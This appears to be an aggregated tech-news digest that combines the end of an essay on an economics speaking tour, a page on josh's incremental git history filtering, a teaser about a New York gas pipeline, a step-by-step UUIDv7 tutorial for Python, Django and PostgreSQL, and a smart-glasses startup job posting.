The most humiliating aspect of being alive today, I suppose, is feeling like one is living through a single, unending commercial break. As the human race disintegrates into increasingly atomized particles of recluses and rejects, one can only “stay in touch” through increasingly dystopian social media feeds that consist mostly of ads, whether traditional influencer trash and/or semi-real short-form video.

It shapes how our institutions function too. Yuval Levin argues that Congress is weak because its members want it to be weak (the shutdown is perhaps a lesson in that). They’ve abandoned the actual work of legislating in favor of what he calls “performative outrage for a partisan audience.” A congressional seat now offers a platform for building personal brands through social media engagement and cable news hits.

Success gets measured in invisible metrics like followers and fundraising emails - while the visible work of governance atrophies. It’s the same inversion: institutions optimizing for performance that compounds in attention economies while the actual infrastructure of democracy decays.

Going back to the conference, everyone on my panel agreed that AI isn’t ready for mass adoption, that there has to be some way for the supposed wealth it will generate to be redistributed, especially if it takes all the jobs. But we landed on the same cautious conclusion that AI is indeed a tool. A hammer can hang a picture or break a skull. The difference is intent.

That framing is helpful until you examine it. We don’t market hammers as ‘skull-crusher 1000s’ but AI gets sold explicitly as a job-taker. The CEOs are going on various podcasts and demanding the energy capacity of India 3 as well as likely inevitable government backstops. The difference is who is holding the tool and what they are promising to break.

By the time I got to Berkeley a few days later, I was thinking more and more about Junior Extinction, or the apparent goal of AI to replace entry level jobs. The Berkeley AI conference had all the optimism you’d expect from the Bay Area with bright people genuinely trying to solve hard problems.

I interviewed two people I respect a lot about this, and the conversation kept circling back to the same place: we have to prepare people. Reskilling isn’t enough. The problem is not just jobs, it’s what happens to purpose and meaning when work disappears. If we erase the first step of the ladder, we can’t just tell people to climb harder.

There are solutions, of course. An interesting paper, The Death of the Social Contract and the Enshittification of Jobs, explores how we can establish a federal job guarantee that prevents the degradation of work and preserves ‘dignity and purpose’ during a time of immense technological change.

After our talk, someone asked me if we were all falling prey to the Luddite mindset, which is usually shorthand for “backwards technophobe,” but the actual Luddites were more interesting than that. Luddites weren’t anti-technology. They were pro-coevolution with technology. They smashed machines when those machines were used to devalue their labor without improving their lives 4 .

The goal is to make technology something that extends human potential rather than reducing it to nothingness - to create visible prosperity rather than just extracting it.

Baltimore was the next stop, three days of conversations about whether the United States has the collective will to survive the AI era. The mood was less sunny than Berkeley. People kept using the word “bubble” - not quite accusing, more like they were testing whether anyone else would say it first.

The questions became existential very quickly. Could America remain the world’s economic center if it kept isolating itself while China industrialized at hyperspeed? If military power and economic power are the same thing, are we already losing the war? If we don’t know what we are fighting for (is it really generative AI TikTok slop? or something else?), can we fight at all?

Tracy Alloway recently compared the AI industry to coffee pods: the US values AI like a $5,000 espresso machine, while China commodifies it and gives the Nespresso pods away for free. She points out that the real AI fight is power availability, not the models. Many data centers are sitting empty because they can’t get electricity.

The valuations are wild. The return profile is shaky. China is conquering the renewable age . JP Morgan pointed out in a note recently that every iPhone user would have to pay $34 a month to drive a 10% return on all the various AI investment deployed.

This is invisible prosperity in its purest form, with billions flowing into server farms and data centers that sit empty, waiting for electricity that may never come. Meanwhile, the college graduates who were told to invest in themselves are experiencing very visible decay - working service jobs with degrees they can’t use, debt-laden, watching AI threaten to eliminate even those fallback positions.

I interviewed New York Times labor reporter Noam Scheiber in Baltimore about his forthcoming book Mutiny, which tracks the downward mobility of college-educated workers and their turn toward unions. These are people who did everything right - got the degree, took on the debt - but couldn’t get jobs in their fields. So they went to work for Starbucks or REI or Amazon. Now they’re unionizing at rates that would have been unthinkable a decade ago.

Noam’s book (which you should read when it comes out) and our conversation really circled the question of work and its purpose. Support for unions among college graduates sits at 70% . The professional managerial class - supposedly individualistic, supposedly above such concerns - is converging with the working class on populist economic views. Tax the rich. Regulate big business. Protect workers from being replaced by algorithms or outsourced to cheaper labor markets.

Talking with Noam

It’s the inverse of what we’re told about education and upward mobility. The college degree was supposed to be the golden ticket. It hasn’t quite worked. Now those graduates are looking for collective solutions to individual failures that were never really individual at all.

The bubble question lingered. Have we bet everything on vapor? Or are we watching the formation of a political coalition that might actually demand something different?

New Hampshire surprised me. My parents got married there 30 years ago, so they came up from Kentucky to spend a day with me. Then I went to a housing conference.

The problem everyone was trying to solve felt pretty concrete - how do you build when no one wants change? The headline answer is zoning reform, but the real answer involves water systems, sewage expansion, labor shortages, financing costs, and the politics of aging.

New Hampshire is the second-oldest state in the country. The median homeowner is in their late fifties. People can’t afford to leave and people can’t afford to move in. Rising mortgage rates have created what economists call “housing lock-in” - your 3% mortgage is now a golden handcuff.

When people can’t move, neither can labor, families, or fertility. There’s a new study showing that housing costs account for about half the US fertility decline between 2000 and 2020. It’s childcare too - a new paper from Abigail Dow reports that a 10% increase in the price of childcare leads to a 5.7% decrease in the birth rate.

The affordability crisis compounds - without affordable homes, young families don’t form. Without young families, the tax base ages. Without young taxpayers, resources shrink. The system eats itself.

In New Hampshire, people talked openly about trade-offs. The state has no income tax, so it relies on property taxes, already among the highest in the country, to fund services. Expanding infrastructure means higher costs somewhere. Hard problems require hard math. But there was this question underneath all of it: how do we grow without losing what feels like home?

New York felt like the opposite of that question. Not “how do we preserve what we have?” but “how do we get to yes?”

I was there for a week or so, which was the longest stop on the trip. Filmed a documentary, shot a commercial, spoke at the Aspen Ideas Conference, joined an NPR debate that felt like being in the eye of a cultural storm (read about that here). New York is exhausting and alive in equal measure. I think the present moment requires some fight, with conviction in values and strength in uncertainty, and New York has that in abundance.

Talking at Aspen Ideas Economy

I spoke with Dean Fuleihan a few days ago, who’s about to be first deputy mayor under Mayor-elect Zohran Mamdani ( Semafor has a good write-up on Lina Khan’s role on the transition team). Mamdani’s campaign was built on affordability 5 , on the premise that government can work if people who believe in it actually try. Fuleihan said “New York is not about saying no. It’s about figuring out how to get to yes.”

I won’t overromanticize the city, but New York remembers itself. Maybe that’s because it’s older, or because the architecture forces you to look up. History lives in the buildings here. Being surrounded by old things makes you aware of the responsibility of keeping them standing. This is what visible investment looks like - infrastructure you can see working (at least somewhat) and architecture that reminds you something was built to last. The question is whether the will to maintain exists elsewhere.

Florida felt strange after New York. I drove from Fort Lauderdale to Marco Island to West Palm Beach, and the whole state felt like it was aging and aspiring at the same time. Lovely place.

I spoke at Palm Beach Atlantic, where my first economics professor is now Dean of the business school (he was the person who first told me that economics was an actual major - I owe him a lot!). The students were amazing. Their questions were practical: How do we afford housing? How do we navigate AI? How do we find meaning in work that might not exist in ten years?

With some PBA students

They’re right to worry. Florida is what America could look like demographically within a decade - older, hotter, more expensive, still trying to grow. It is the most rent-burdened state in the country. You can see wealth in West Palm Beach - the waterfront towers, the private clubs, $175 million condos (!) - but it’s tough to see a path toward it.

By the time I landed in Prague, I’d spent three weeks watching Americans argue about whether we could still build anything. Prague answered soundly - yes, we can still build things.

I was there to interview Morgan Housel and give a talk on what I’ve started calling the uncertainty smoothie - AI, geopolitics, demographics, fiscal chaos, all blended into one overwhelming question mark. I was haunted by jet lag the entire trip, so I walked ten miles through the city.

It was so deliberate. Trams that ran on time. Wide sidewalks. Leaf vacuums instead of leaf blowers. Each small choice accumulated into proof that someone thought about how systems should work.

You could feel the economy in public space in trams, bridges, parks, civic buildings. Economists call this “middle-income convergence.” Czechia is catching up to Western Europe in productivity and wages, but it’s still small enough that growth is visible.

Again, in the US, growth happens in spreadsheets and server farms, in data centers behind chain-link fences that hire only 800 people for a $50b investment , on social media apps, in private, gated communities. Our prosperity is increasingly invisible. The result is this strange alienation where people sense the economy is humming somewhere, but not for them.

Economies that invest in visible competence generate trust, and trust is an economic asset. When systems decay, even rising GDP feels hollow. Infrastructure is emotional architecture. When things work, people believe life can too. Maintenance generates trust. Trust compounds.

Ireland was the perfect final stop. My grandparents immigrated from Roscommon and Sligo in the 1950s, went back once, then came back to the States for good. Going there felt important.

I went for Kilkenomics, the world’s best economics festival. Just phenomenal. I joined four panels - a podcast with David McWilliams, one on America’s economy, another on data, and a final one on algorithms.

Graffiti from Ireland

The audience questions were remarkable. “How would Keynes feel about all of this?” “How do we measure crony capitalism?” Everyone was wrestling with the same question that followed me all month: How do you keep a system human?

Inside Kilkenny Castle, I felt the fatigue of the trip catch up with me. The fortress has changed hands through conquest and crisis for nearly a thousand years and now stands open to anyone who wants to walk its halls.

I then climbed the narrow staircase of St. Canice’s Cathedral to the old monks’ tower. It’s been standing since the sixth century, where bells once rang to call monks to prayer. Standing there, I thought about the past month. The tanks and the clown in DC. The engineers in Berkeley. The union organizers in Baltimore. The housing advocates in New Hampshire. The students in Florida. The people in New York. The quiet competence of Prague. Everyone trying to keep something upright, whether it be an economy, a community, a sense of self.

St. Canice is the patron saint of the shipwrecked - of those who have gone through great trial and somehow survived. In a way, the tower itself is the answer to the question I’d been unknowingly chasing all month.

America’s problem isn’t that we lack wealth - we have enormous wealth - it’s that we’ve made our wealth invisible while letting everything visible decay in a way. We’ve inverted the formula.

Northern Ireland’s peace process, as Robert Saldin and Robert Eisinger have written, succeeded partly because communities deliberately shifted focus from the existential debate between nationalists and unionists to local projects where compromise was possible. It was maintenance. Working together on visible problems created space for former enemies to reconcile themselves to living as neighbors.

When I started crying in that tower, I think it was partly exhaustion. Partly standing in a place my family came from. Partly sadness for what feels so challenging at home. Partly hope that enough people are still trying to rebuild what matters. Partly because I’d spent 30 days watching people try to make prosperity visible again - to build systems you can see, touch, and trust.

Thanks for reading.

Just One Single History

Lobsters
josh-project.github.io
2025-11-14 21:51:07
Comments...
Original Article

Just One Single History

Josh combines the advantages of monorepos with those of multirepos by leveraging a blazingly-fast, incremental, and reversible implementation of git history filtering.

Concept

Traditionally, history filtering has been viewed as an expensive operation that should only be performed to fix issues with a repository, such as purging big binary files or removing accidentally-committed secrets, or as part of a migration to a different repository structure, like switching from multirepo to monorepo (or vice versa).

The implementation shipped with git (git filter-branch) is only usable as a once-in-a-lifetime last resort for anything but tiny repositories.

Faster versions of history filtering have been implemented, such as git-filter-repo or the BFG repo cleaner . Those, while much faster, are designed for doing occasional, destructive maintenance tasks, usually with the idea already in mind that once the filtering is complete the old history should be discarded.

The idea behind josh started with two questions:

  1. What if history filtering could be so fast that it can be part of a normal, everyday workflow, running on every single push and fetch without the user even noticing?
  2. What if history filtering was a non-destructive, reversible operation?

Under those two premises a filter operation stops being a maintenance task. It seamlessly relates histories between repos, which can be used by developers and CI systems interchangeably in whatever way is most suitable to the task at hand.

How is this possible?

Filtering history is a highly predictable task: The set of filters that tend to be used for any given repository is limited, and the input to the filter (a git branch) only gets modified in an incremental way. Thus, by keeping a persistent cache between filter runs, the work needed to re-run a filter on a new commit (and its history) becomes proportional to the number of changes since the last run; the work to filter no longer depends on the total length of the history. Additionally, most filters also do not depend on the size of the trees.

What has long been known to be true for performing merges also applies to history filtering: The more often it is done the less work it takes each time.
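
As a rough illustration of why the persistent cache makes re-filtering cheap, here is a hypothetical Go sketch of memoized history filtering. It is not josh's actual data model or code, just the shape of the idea.

package filter

// Commit is a deliberately simplified stand-in for a git commit.
type Commit struct {
    ID      string
    Tree    string
    Parents []*Commit
}

// FilterHistory rewrites the history reachable from tip through filterTree,
// reusing results cached from previous runs. Commits already filtered are
// returned directly, so a new push only costs work for the new commits.
func FilterHistory(tip *Commit, filterTree func(string) string, cache map[string]*Commit) *Commit {
    if done, ok := cache[tip.ID]; ok {
        return done
    }
    out := &Commit{ID: "filtered:" + tip.ID, Tree: filterTree(tip.Tree)}
    for _, p := range tip.Parents {
        out.Parents = append(out.Parents, FilterHistory(p, filterTree, cache))
    }
    cache[tip.ID] = out
    return out
}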

To guarantee filters are reversible, we have to restrict the kind of filter that can be used; it is not possible to write arbitrary filters using a scripting language as is allowed in other tools. To still be able to cover a wide range of use cases, we have introduced a domain-specific language to express more complex filters as a combination of simpler ones. Apart from guaranteeing reversibility, the use of a DSL also enables pre-optimization of filter expressions to minimize both the amount of work to be done to execute the filter as well as the on-disk size of the persistent cache.

From Linus Torvalds 2007 talk at Google about git:

Audience:

Can you have just a part of files pulled out of a repository, not the entire repository?

Linus:

You can export things as tarballs, you can export things as individual files, you can rewrite the whole history to say "I want a new version of that repository that only contains that part", you can do that, it is a fairly expensive operation it's something you would do for example when you import an old repository into a one huge git repository and then you can split it later on to be multiple smaller ones, you can do it, what I am trying to say is that you should generally try to avoid it. It's not that git cannot handle huge projects, git would not perform as well as it would otherwise. And you will have issues that you wish you didn't not have.

So I am skipping this issue and going back to the performance issue. One of the things I want to say about performance is that a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true.

That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.

Kathy Hochul's 'Affordability' Excuse for Building a Gas Pipeline Doesn't Even Make Sense

hellgate
hellgatenyc.com
2025-11-14 21:46:47
The centrist Democrat has gone all-in on setting the climate on fire as crypto-investors, fossil fuel executives, and her own husband cash in....
Original Article
Kathy Hochul's 'Affordability' Excuse for Building a Gas Pipeline Doesn't Even Make Sense
Ravenswood Generating Station in Queens. (Scott Heins / Hell Gate)

Climate

The centrist Democrat has gone all-in on setting the climate on fire as crypto-investors, fossil fuel executives, and her own husband cash in.

Scott's Picks:

Over the past 15 days, Governor Kathy Hochul has: fought the orders of a state judge who said she must enforce the state's climate laws; announced she was going to delay the implementation of the state's move to all-electric buildings; approved a climate-killing pipeline that will run through New York Harbor from the South Shore of Staten Island to the Rockaways, five years after it was originally denied; and allowed a cryptocurrency outfit to keep running a dirty fossil fuel plant to mine digital currencies.

Why is she doing this? What's the point? According to her office, it's not a "ruining-the-planet" approach, it's an "all-of-the-above approach" in the name of "affordability."


How to use UUIDv7 in Python, Django and PostgreSQL

Lobsters
www.paulox.net
2025-11-14 21:21:29
Comments...
Original Article

Learn how to use UUIDv7 today with stable releases of Python 3.14, Django 5.2 and PostgreSQL 18. A step by step guide showing how to generate UUIDv7 in Python, store them in Django models, use PostgreSQL native functions and build time ordered primary keys without writing SQL.

© 2025 Paolo Melchiorre CC BY-SA “Torre di Cerrano framed by the coastal maritime pine woods in Pineto, Italy.”
© 2025 Paolo Melchiorre CC BY-SA “Torre di Cerrano framed by the coastal maritime pine woods in Pineto, Italy.”

Introduction

UUIDv7 is finally available in the entire Python Django PostgreSQL stack. It provides time ordering, better index locality and easier reasoning about data creation compared to UUIDv4. All of this can be used today with stable versions and without custom extensions.

In this article I walk through a practical example showing how UUIDv7 works in Python first and then in PostgreSQL using Django ORM and migrations only. No manual SQL is needed and every step shows real code and migration output.

What is a UUID

A UUID is a 128 bit identifier that aims to be globally unique without coordination. It works well in distributed systems because it removes the need for a central sequence generator. This makes UUIDs ideal for many modern architectures.

The most common version is UUIDv4 which is fully random. UUIDv7 improves on this by adding a timestamp prefix that makes identifiers sort in creation order. This helps index locality and makes inserts more efficient.

UUIDv4 vs UUIDv7

UUIDv4

  • Fully random
  • Very good uniqueness
  • Poor index locality in large tables
  • Inserts become random writes
  • Hard to infer creation time

UUIDv7

  • Timestamp based and time ordered
  • Better index locality and more predictable writes
  • Creation time can be extracted directly
  • Suitable as a primary key in high write environments

Why ordering matters

Because a UUIDv7 begins with a timestamp, new values follow a natural ordering. Database indexes work better with ordered inserts since they reduce fragmentation and avoid many of the random writes caused by UUIDv4.

UUIDv7 is a strong alternative to traditional auto incrementing integer IDs in new Django projects because it combines global uniqueness with predictable ordering. While integers are simple and efficient, they require coordination across services and can complicate sharding or offline workflows. UUIDv7 keeps inserts sequential enough for good index locality while avoiding the bottlenecks of a central sequence. This makes it a practical default identifier for modern architectures where horizontal scaling or distributed processing are likely to appear later.

Preparing the environment

Python 3.14 is assumed to be available. The first step is creating a virtual environment and installing Django and Black, which will prepare the project structure and dependencies needed for the tutorial.

Creating the virtual environment

This step creates a clean virtual environment with Python 3.14 and installs the tools needed to start the Django project.

$ python3.14 -m venv .venv
$ source .venv/bin/activate
$ python -m pip install django black

Creating a Django project and the first UUIDv7 model

The next step is creating the Django project and application that will contain the model used in the UUIDv7 example.

Creating the Django project and application

Here we start a new Django project named uuidv7 and add an items app that will contain the models used in the examples.

$ python -m django startproject uuidv7
$ tree --noreport uuidv7/
uuidv7/
├── manage.py
└── uuidv7
    ├── asgi.py
    ├── __init__.py
    ├── settings.py
    ├── urls.py
    └── wsgi.py
$ cd uuidv7
$ python -m django startapp items
$ tree --noreport items/
items/
├── admin.py
├── apps.py
├── __init__.py
├── migrations
│   └── __init__.py
├── models.py
├── tests.py
└── views.py

Enable the app in settings:

INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "items",
]

Creating the Item model using Python uuid.uuid7

This model uses Python 3.14’s built-in uuid.uuid7 for primary key generation and adds a cached_property to extract the timestamp from the UUID. It demonstrates client-side UUIDv7 usage without depending on the database.

import uuid
from datetime import datetime

from django.db import models
from django.utils.functional import cached_property


class Item(models.Model):
    uuid = models.UUIDField(default=uuid.uuid7, primary_key=True)

    @cached_property
    def creation_time(self):
        return datetime.fromtimestamp(self.uuid.time / 1000)

Creating the initial migration

This section generates the migration file that defines the database table for the Item model. The migration uses SQLite as the default backend and produces a straightforward schema containing only the UUID column.

$ python -m manage makemigrations
Migrations for 'items':
  items/migrations/0001_initial.py
    + Create model Item

Inspecting the SQL for SQLite

This command shows the SQL that Django will run on SQLite, making it easier to understand how the Item model is represented in the database.

$ python -m manage sqlmigrate items 0001
BEGIN;
--
-- Create model Item
--
CREATE TABLE "items_item" (
    "uuid" char(32) NOT NULL PRIMARY KEY
);
COMMIT;

Applying the migration

Now we apply the migration so the Item table is created in the local SQLite development database.

$ python -m manage migrate items 0001
Operations to perform:
  Target specific migration: 0001_initial, from items
Running migrations:
  Applying items.0001_initial... OK

Testing the Item model in Django shell

This example creates an Item instance and reads the timestamp encoded in its UUIDv7 value.

>>> item = Item()
>>> item.creation_time.isoformat()
'2025-11-14T16:52:55.879000'
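
Because the timestamp leads the UUID, ordering by the primary key roughly follows insertion order. A quick check in the same shell session (a sketch; output omitted):

>>> Item.objects.bulk_create([Item() for _ in range(3)])
>>> list(Item.objects.order_by("uuid").values_list("uuid", flat=True))  # roughly insertion order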

Using UUIDv7 in PostgreSQL 18 with Django 5.2

PostgreSQL 18 adds native support for UUIDv7 and timestamp extraction, making it possible to generate the UUID directly in the database. This section shows how to configure Django to use PostgreSQL and how to create models that rely on these functions.

Installing psycopg

We install psycopg, the PostgreSQL driver used by Django, so the project can connect to a PostgreSQL 18 database.

$ python -m pip install psycopg[binary]

Configuring PostgreSQL in settings.py

The database configuration is updated to point Django to a PostgreSQL 18 instance instead of SQLite.

DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.postgresql",
        "HOST": "postgres",
        "NAME": "uuidv7",
        "PASSWORD": "postgres",
        "PORT": "5432",
        "USER": "postgres",
    }
}
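
With the settings above in place, a quick check from the Django shell confirms that the server really exposes the new function (a minimal sketch; the connection details are the placeholders shown above):

from django.db import connection

# Ask PostgreSQL 18 to generate a UUIDv7 value directly.
with connection.cursor() as cursor:
    cursor.execute("SELECT uuidv7()")
    print(cursor.fetchone()[0])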

Creating the Record model with PostgreSQL generated UUIDv7

The following model uses Django’s db_default to call the uuidv7 function directly inside PostgreSQL, so the UUID is generated by the database during the insert operation.

Defining a Django database function for uuidv7

This Django function wrapper maps directly to PostgreSQL’s uuidv7 function so it can be used in model definitions.

class UUIDv7(models.Func):
    function = 'uuidv7'
    output_field = models.UUIDField()

Creating the Record model

The Record model uses PostgreSQL uuidv7 to generate the primary key at insert time.

class Record(models.Model):
    uuid = models.UUIDField(db_default=UUIDv7(), primary_key=True)

Creating the migration for the Record model

We create the migration that defines the database table storing UUIDv7 values generated by PostgreSQL.

$ python -m manage makemigrations
Migrations for 'items':
  items/migrations/0002_record.py
    + Create model Record

Inspecting the migration SQL for PostgreSQL

This command shows the SQL generated by Django for the Record model when using PostgreSQL.

$ python -m manage sqlmigrate items 0002
BEGIN;
--
-- Create model Record
--
CREATE TABLE "items_record" (
    "uuid" uuid DEFAULT (uuidv7()) NOT NULL PRIMARY KEY
);
COMMIT;

Applying the migration

Applying this migration creates the items_record table in PostgreSQL using the uuidv7 default.

$ python -m manage migrate items 0002
Operations to perform:
  Target specific migration: 0002_record, from items
Running migrations:
  Applying items.0001_initial... OK
  Applying items.0002_record... OK

Testing the Record model

Here we create a new Record and verify that PostgreSQL generated a UUIDv7 value.

>>> record = Record.objects.create()
>>> record.uuid
UUID('019a8359-f49d-7f56-8921-977e2c47242c')

Extracting the timestamp with uuid_extract_timestamp

PostgreSQL 18 also offers uuid_extract_timestamp, which extracts the timestamp encoded inside a UUIDv7. This section shows how to expose that value in Django using a GeneratedField.

Defining a Django database function for uuid_extract_timestamp

This function wrapper exposes PostgreSQL’s uuid_extract_timestamp so it can be used in a GeneratedField.

class UUIDExtractTimestamp(models.Func):
    function = "uuid_extract_timestamp"
    output_field = models.DateTimeField()

Adding the creation_time generated column

The Record model is extended with a generated column that stores the timestamp extracted from the UUID.

class Record(models.Model):
    uuid = models.UUIDField(db_default=UUIDv7(), primary_key=True)
    creation_time = models.GeneratedField(
        expression=UUIDExtractTimestamp("uuid"),
        output_field=models.DateTimeField(),
        db_persist=True,
    )

Generating the migration for creation_time

This migration adds the creation_time column and configures PostgreSQL to compute it automatically.

$ python -m manage makemigrations
Migrations for 'items':
  items/migrations/0003_record_creation_time.py
    + Add field creation_time to record

Inspecting the SQL for the generated column

This shows the SQL statement that defines the generated timestamp column in PostgreSQL.

$ python -m manage sqlmigrate items 0003
BEGIN;
--
-- Add field creation_time to record
--
ALTER TABLE "items_record"
ADD COLUMN "creation_time" timestamp with time zone
GENERATED ALWAYS AS (uuid_extract_timestamp("uuid")) STORED;
COMMIT;

Applying the migration

Running this migration creates the generated column and enables timestamp extraction for new rows.

$ python -m manage migrate items 0003
Operations to perform:
  Target specific migration: 0003_record_creation_time, from items
Running migrations:
  Applying items.0003_record_creation_time... OK

Testing the creation_time generated column

This final example inserts a new Record and checks the extracted timestamp stored in the generated column.

>>> record = Record.objects.create()
>>> record.creation_time.isoformat()
'2025-11-14T17:18:24.144000+00:00'

Summary

Use Python uuid.uuid7 when:

  • identifiers must be generated inside application code
  • SQLite or non-PostgreSQL databases are used
  • identifiers are needed before the row is saved, for example in offline or batch workflows

Use PostgreSQL uuidv7 when:

  • the database is responsible for generating identifiers
  • multiple writers insert rows concurrently
  • you want to expose creation time using uuid_extract_timestamp
  • sequential inserts improve performance

Both methods are valid and can be mixed in the same project.

Key takeaways

  • UUIDv7 provides ordered identifiers that improve index locality and reduce random writes compared to UUIDv4.
  • Python 3.14 can generate UUIDv7 directly with uuid.uuid7, making it easy to use even without database support.
  • PostgreSQL 18 adds native uuidv7 and uuid_extract_timestamp, allowing server-side UUID generation and timestamp extraction without storing extra fields.
  • Django 5.2 integrates smoothly with both Python and PostgreSQL UUIDv7 through db_default and GeneratedField.
  • UUIDv7 should not be exposed directly in public APIs because the embedded timestamp can reveal creation patterns or activity timing.
  • UUIDv47 offers a reversible masking approach that keeps UUIDv7 internally while exposing a UUIDv4-looking value externally.

Considering the downsides of UUIDv7 and possible solutions

Drawbacks of exposing UUIDv7 to external users

UUIDv7 works very well inside a database, but it is not always ideal as a public identifier. Because the most significant bits contain a precise Unix timestamp, anyone who sees the UUID can infer when the record was created. This can reveal activity patterns, account creation times, or traffic trends, which in some contexts can aid correlation or de-anonymization attacks. The random portion of the UUID remains intact, but the timestamp still leaks meaningful metadata. For these reasons UUIDv7 is generally recommended for internal use, while external-facing APIs should avoid exposing it directly.
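
To make the leak concrete, here is a minimal sketch (assuming Python 3.14 and reusing the UUID shown earlier) of what anyone holding a raw UUIDv7 can recover:

import uuid
from datetime import datetime, timezone

# Any UUIDv7 seen in a URL, API response, or log will do.
public_id = uuid.UUID("019a8359-f49d-7f56-8921-977e2c47242c")

# The most significant 48 bits are a Unix timestamp in milliseconds.
created_at = datetime.fromtimestamp(public_id.time / 1000, tz=timezone.utc)
print(created_at.isoformat())  # reveals roughly when the record was created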

Masking UUIDv7 timestamps with UUIDv47

A practical solution to these issues is provided by the UUIDv47 approach. The idea is to keep a true UUIDv7 inside the database, so that ordering and index locality are preserved, but to expose a masked representation externally. UUIDv47 applies a reversible SipHash-based transformation to the timestamp field only, using a key derived from the random portion of the UUID. The result looks like a UUIDv4 to clients and hides the timing information, while still mapping deterministically and invertibly back to the original internal UUIDv7.

The project implementing this idea is available here: https://github.com/stateless-me/uuidv47
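
The sketch below illustrates the general idea only and is not the uuidv47 library’s actual algorithm: it XORs the 48-bit timestamp with a keyed mask derived from the UUID’s untouched low bits (HMAC-SHA-256 stands in for SipHash, and the key is a placeholder), then relabels the version nibble so the result presents as a UUIDv4:

import hashlib
import hmac
import uuid

SECRET_KEY = b"replace-with-a-real-secret"  # placeholder key

def _mask(u: uuid.UUID) -> int:
    # Derive a 48-bit mask from the 76 bits below the version nibble,
    # which the masking never touches, so encode and decode agree.
    low_bits = u.int & ((1 << 76) - 1)
    digest = hmac.new(SECRET_KEY, low_bits.to_bytes(10, "big"), hashlib.sha256).digest()
    return int.from_bytes(digest[:6], "big")

def to_public(u7: uuid.UUID) -> uuid.UUID:
    ts = u7.int >> 80                           # the 48-bit unix_ts_ms field
    masked = ts ^ _mask(u7)
    out = (masked << 80) | (u7.int & ((1 << 80) - 1))
    out = (out & ~(0xF << 76)) | (0x4 << 76)    # present the version as 4
    return uuid.UUID(int=out)

def to_internal(pub: uuid.UUID) -> uuid.UUID:
    restored = (pub.int & ~(0xF << 76)) | (0x7 << 76)  # version back to 7
    u = uuid.UUID(int=restored)
    ts = (u.int >> 80) ^ _mask(u)
    return uuid.UUID(int=(ts << 80) | (u.int & ((1 << 80) - 1)))

original = uuid.uuid7()                         # Python 3.14+
assert to_internal(to_public(original)) == original

The real implementation uses SipHash and a configured masking key, as the packages above describe; this sketch only mirrors the reversible round-trip property.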

Django support through django uuid47

For Django users there is a dedicated integration package that implements UUIDv47 as a model field and handles configuration of the masking key. This allows applications to adopt masked UUIDv7 identifiers without altering the rest of the schema or the way models are defined.

The Django integration package is available here: https://pypi.org/project/django-uuid47/

Further reading

This article builds on Django GeneratedField which I have covered in a dedicated series on my blog:

  1. Database generated columns⁽¹⁾: Django SQLite
  2. Database generated columns⁽²⁾: Django PostgreSQL
  3. Database generated columns⁽³⁾: GeoDjango PostGIS

Frequently asked questions

Is UUIDv7 stable?
Yes. It is part of the updated UUID specification (RFC 9562) and fully implemented in Python 3.14 and PostgreSQL 18.
Does Django support UUIDv7?
Yes. Django works with UUIDv7 without custom fields because Python and PostgreSQL provide the required functions.
Can UUIDv7 be used as a primary key?
Yes. It offers far better index locality than UUIDv4 and is well suited to primary keys in most applications.
Should I migrate existing data from UUIDv4 to UUIDv7?
It depends on your system. New projects can adopt UUIDv7 immediately, while migrating existing data requires careful consideration.
Does UUIDv7 require PostgreSQL 18?
Only for database-side generation. Native uuidv7 and uuid_extract_timestamp arrive in PostgreSQL 18, but Python-generated UUIDv7 values work with any backend.
Do I need a custom Django field to use UUIDv7?
No. UUIDField works correctly with both Python and PostgreSQL generated UUIDv7 values.
Is it safe to expose raw UUIDv7 values in public APIs?
Not always. UUIDv7 encodes a timestamp in its most significant bits, which can reveal when a record was created. Where identifiers are visible to untrusted users, it is safer to use a masking scheme like UUIDv47 or expose a separate UUIDv4 instead.

Conclusions

UUIDv7 offers ordering, predictable inserts and timestamp extraction without losing UUID benefits. With Python 3.14, Django 5.2 and PostgreSQL 18 it can be used today without custom extensions or complex setup.

Discuss this article

If you want to comment or share feedback you can do so on:

  • Hacker News
  • Lobsters
  • Reddit

Mentra (YC W25) Is Hiring: Head of Growth to Make Smart Glasses Mainstream

Hacker News
www.ycombinator.com
2025-11-14 21:00:25
Comments...
Original Article

Building the open source smart glasses operating system.

Make SMART GLASSES Mainstream - Head of Growth

$110K - $160K 0.10% - 0.70% San Francisco, CA, US

Experience

Any (new grads ok)

About the role

Mentra is building the operating system for smart glasses. Smart glasses will empower humans to be more than ever before. Use cases like subtitles for the deaf, proactive AI that assists during conversations, and POV streaming enhance our thinking and communication.

Mentra’s mission is to build universal interfaces between mind and machine.

We’re a team of passionate builders in San Francisco and Shenzhen building the world’s best smart glasses. We believe that the best future for computing is open, user-empowering, and cross-compatible.

We’re sitting on the most transformative technology since the iPhone and we need a Head of Growth to help us tell our story and show the world what smart glasses can do for them.

The Role

We’re hiring a Head of Growth to bring smart glasses to millions of people.

Success looks like this: Mentra is what people think of when they hear “smart glasses”. Thousands of devs in February building apps on MentraOS. Dozens of companies ordering 10,000s of units by Q2 2024. Viral launch videos online define internet culture. Big content creators use our glasses in their videos to make better content. 100,000 deaf/HoH people in 2026 using Mentra live captions.

The opportunity to show humanity that technology can once again be a force of good in the world.

What you’ll do:

  • Own product growth for Mentra. 2 key KPIs:
    • WAUs on MentraOS
    • Sales of Mentra smart glasses
  • Leadership:
    • Work with CEO to help align the entire team (engineering, design, content) for product growth
    • Content team includes various third parties to manage:
      • Internal hire - videographer
      • Influencers
  • Website
    • Work with CEO to own the content on the site
    • Work with design team to design a new website
  • PR
  • Ads
  • Events
    • Grow mind share in devs, B2B, deaf/HoH consumers
  • Email
    • Community update
    • Email marketing
    • DRIP campaigns
  • Content
    • Lead content for our own socials
  • B2B
    • Help create B2B content
    • Enterprise conferences
  • Affiliates:
    • Run programs with affiliates like influencers, UGC, and community ambassadors

What we’re looking for:

  • Track record of success in a growth role. Have you launched a high conversion email campaign, got into the New York Times, went viral on TikTok, or helped a startup scale to 100,000 users? Let’s talk
  • Ownership: ready to dive in and setup various systems across all of growth.
  • Wide skillset: Marketing, product, communication, events, content, etc.
  • IRL in San Francisco.
  • Proactive, high-ownership, crazy passionate about smart glasses/AR.

Apply if you want to scale the next personal computer to billions of users.

About Mentra

Mentra is building MentraOS, the open-source OS for smart glasses. It's like Android for smart glasses.

Smart glasses hardware is finally ready, and we're building the software ecosystem to unlock the next personal computer.

